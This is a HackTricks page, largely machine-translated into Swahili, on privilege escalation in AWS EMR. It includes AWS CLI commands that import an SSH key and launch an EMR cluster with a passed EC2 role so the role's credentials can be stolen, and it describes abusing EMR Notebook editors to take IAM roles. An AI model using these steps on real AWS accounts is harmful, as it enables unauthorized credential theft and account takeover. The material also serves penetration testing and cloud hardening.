AWS - EMR Privesc

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

EMR

Maelezo zaidi kuhusu EMR yanapatikana:

pageAWS - EMR Enum

iam:PassRole, elasticmapreduce:RunJobFlow

Mshambuliaji mwenye ruhusa hizi anaweza kuendesha kikundi kipya cha EMR kikiambatanisha majukumu ya EC2 na kujaribu kuiba vibali vyake. Tafadhali kumbuka kwamba ili kufanya hivi unahitaji kujua funguo ya siri ya ssh iliyosafirishwa kwenye akaunti au kuagiza moja, na uweze kufungua bandari 22 kwenye nodi ya bwana (unaweza kufanya hivi kwa sifa EmrManagedMasterSecurityGroup na/au ServiceAccessSecurityGroup ndani ya --ec2-attributes).

# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key


aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc

# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances

Tafadhali kumbuka jinsi jukumu la EMR linavyotajwa katika --service-role na jukumu la ec2 linavyotajwa katika --ec2-attributes ndani ya InstanceProfile. Hata hivyo, mbinu hii inaruhusu tu kuiba sifa za jukumu la EC2 (kwani utaunganisha kupitia ssh) lakini sio jukumu la EMR IAM.

Athari Inayowezekana: Privesc kwa jukumu la huduma la EC2 lililotajwa.

elasticmapreduce:CreateEditor, iam:ListRoles, elasticmapreduce:ListClusters, iam:PassRole, elasticmapreduce:DescribeEditor, elasticmapreduce:OpenEditorInConsole

Kwa idhini hizi, mshambuliaji anaweza kwenda kwenye konsoli ya AWS, kuunda Mwongozo na kufikia ili kuiba Jukumu la IAM.

Hata kama unaweka jukumu la IAM kwa kifaa cha mwongozo katika majaribio yangu niligundua kuwa niliweza kuiba sifa zilizosimamiwa na AWS na sio sifa zinazohusiana na jukumu la IAM.

Athari Inayowezekana: Privesc kwa jukumu la usimamizi wa AWS arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

elasticmapreduce:OpenEditorInConsole

Kwa idhini hii pekee, mshambuliaji ataweza kufikia Mwongozo wa Jupyter na kuiba jukumu la IAM linalohusiana nalo. URL ya mwongozo ni https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/

Hata kama unaweka jukumu la IAM kwa kifaa cha mwongozo katika majaribio yangu niligundua kuwa niliweza kuiba sifa zilizosimamiwa na AWS na sio sifa zinazohusiana na jukumu la IAM`.

Athari Inayowezekana: Privesc kwa jukumu la usimamizi wa AWS arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

Jifunze kuhusu udukuzi wa AWS kutoka mwanzo hadi mtaalamu na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Last updated